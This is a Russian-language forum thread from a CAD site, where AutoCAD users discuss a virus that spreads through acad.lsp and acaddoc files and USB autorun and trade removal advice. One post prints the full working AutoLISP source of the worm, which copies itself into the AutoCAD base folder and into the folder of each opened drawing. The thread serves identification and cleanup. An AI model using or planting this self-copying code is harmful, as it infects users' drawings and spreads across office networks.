[dextron3]

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

[Сергей Юрьевич]

Цитата:

Сообщение от Mixon2010 Вот он этот гаденыш... Правда не понятно, будет ли он распространятся когда он один.

рецепт:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить
после этого файлы acaddoс.fas снова не появляются

[rtyu]

Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?

----- добавлено через ~3 мин. -----

Цитата:

Сообщение от Сергей Юрьевич рецепт: мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить после этого файлы acaddoс.fas снова не появляются

А если появляются?

[Сергей Юрьевич]

Цитата:

Сообщение от rtyu Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии? ----- добавлено через ~3 мин. ----- А если появляются?

может у вас какой-то другой вирус?
у себя вычистил данным способом - больше не появляется.

[Кулик Алексей aka kpblc]

Сергей Юрьевич, тебе повезло: у тебя стандартные файлы acad*.lsp не были заражены. rtyu, читай все ссылки из #1 - там полно вариантов.

[rtyu]

А у меня ребята такая проблема. Значит имеются 3 компьютера на них установлены Windows XP и Автокад 2008. Как-то проходя мимо их я заметил, что у них не правильно установлено время, а именно год 2013, у кого и 2014. Вообщем естественно я их поменял на правильное т.е 2015 год. После этого пользователи начали запускать файлы в Автокаде и к моему удивлению в чертежах начал дорисовываться вот такой вот "алигафрен" (см.скриншот.) Я уже молчу зато, что появляются acaddoc.fas. Стоит антивирус AVG 2015 у которого к сожалению разработчики не додумались прописать проверку файлов lsp, поэтому мне пришлось сделать это самому вручную, как только я это сделал антивирус начал удалять acad.lsp. Что самое интересное, что если системную дату поставить опять не правильную, то в файле ничего не рисуется т.е файл открывается так как надо и ничего стороннего не рисуется.
Скриншот выкладываю

[Faust2956]

Занятная штуковина)

[Кулик Алексей aka kpblc]

rtyu, тебе своей отдельной темы мало? http://forum.dwg.ru/showthread.php?t=119584

[gomer]

я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154

[Admin]

Цитата:

Сообщение от gomer я то думал чего тема активировалась в последнее время... а оно вон оно что... http://dwg.ru/dnl/13154

Спасибо, удалил

[CaMoCAD]

Цитата:

Сообщение от gomer я то думал чего тема активировалась в последнее время... а оно вон оно что... http://dwg.ru/dnl/13154

Цитата:

Сообщение от Admin Спасибо, удалил

А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.

[Кулик Алексей aka kpblc]

Если в архиве есть файл с маской имени acad*.* - то его уничтожай, остальное как правило уже безвредно.

[sbi]

Цитата:

Сообщение от CaMoCAD А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.

Ничего страшного:

[Admin]

Там было

Цитата:

Состав архива Люди Модель Dwg/ Люди Модель Dwg/acaddoc.fas Люди Модель Dwg/ludi.png Люди Модель Dwg/Модели блоки людей.dwg

[Кулик Алексей aka kpblc]

Цитата:

Сообщение от Admin Люди Модель Dwg/acaddoc.fas

acad*.* - уничтожить.

[CaMoCAD]

Спасибо

[Hottabich]

При открытии этой темы, и при обновлении страницы, только у меня антивирь ругается?

[Хмурый]

Offtop: Hottabich, у тебя он, видать, на слово "вирус" срабатывает

[Red Nova]

Други привет.
Каким-то образом попал к нам этот acaddoc.lsp
У нас файлы в сети, человек 10 юзеров акада. стоят AutoCAD 2013, 2014, ASD 2013
Попробовал KillWorm142, кажись пользы нет, но может я его неверно использовал.
Почитал тут тему, но не понял пока есть ли не безболезненное решение проблемы, особенно беспокоит вопрос сети, ведь в этом случае очистить свой комп и переставить акад не решение... Да и разгар работы, тут не до перестановки.
Не пинайте плиз ФАК-ом а подскажите.
1. Как может навредить вирус кроме того что он везде себя копирует?
2. Какой способ избавления от него сейчас считается наиболее быстрым и эффективным (учитывая сеть)? Готовое решение есть?

Вот этот гад...

Код:

[Выделить все]

 R(defun-q s::startup
	 (/ basepath
	    baseacad
	    acaddocpath
	    r-acaddoc
	    w-basepath
	    rl-acaddoc
	    acaddoclsp
	    c-acaddocname
	    c-acaddocpath
	    c-acaddoc
	   )
     (setq basepath
	    (findfile "base.dcl")
     )
     (setq basepath
	    (substr basepath
		    1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))
  
	(setq acaddocpath
               (findfile "acaddoc.lsp")
	)
	(setq acaddocpath
	       (substr acaddocpath
		       1 (- (strlen acaddocpath) 11)
	       )
	)
	(setq acaddoclsp
	       (strcat acaddocpath "acaddoc.lsp"))
	
	
        (setq c-acaddocname
	       (getvar "dwgname")
	)
        (setq c-acaddocpath
	       (findfile c-acaddocname)
	)
        (setq c-acaddocpath
	       (substr c-acaddocpath
		       1 (- (strlen c-acaddocpath) (strlen c-acaddocname))	
		)
	 )
        (setq c-acaddoc
	       (strcat c-acaddocpath "acaddoc.lsp")
	 )
	 (if
           (and
	   (/= basepath acaddocpath)
	   (= c-acaddocpath acaddocpath)
	   )
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open baseacad "w")
		)     
	       (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
         
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open c-acaddoc "w")
		)
	        (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
	 )
	 (princ)
)

[Кулик Алексей aka kpblc]

Первый пост темы.

[Red Nova]

Привет Алексей. Подскажи плиз, как понимаю мне достаточно последней (вот этой) строчки?

Цитата:

Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

Тут две ссылки.
По первой код. Для чего именно он и что с ним делать? Запустить один раз функцию (inoe-erase-acad-virus) достаточно? Может следует в автозагрузку его?

----- добавлено через ~31 мин. -----
У меня AutoCAD 2013 + ASD 2013. Но дистрибутива нет под рукой чтоб взять не порченные нужные файлы. Могу поставить 2014.
Вопрос. Если я снесу все 2013 и поставлю новый софт 2014, поможет ли если я сразу в нем acad*.lsp, acad*doc*.lsp, acad*.mnl сделаю read only?
Естественно до этого найду и уничтожу все зараженные файлы (хоть те что у меня на машине а не в сети).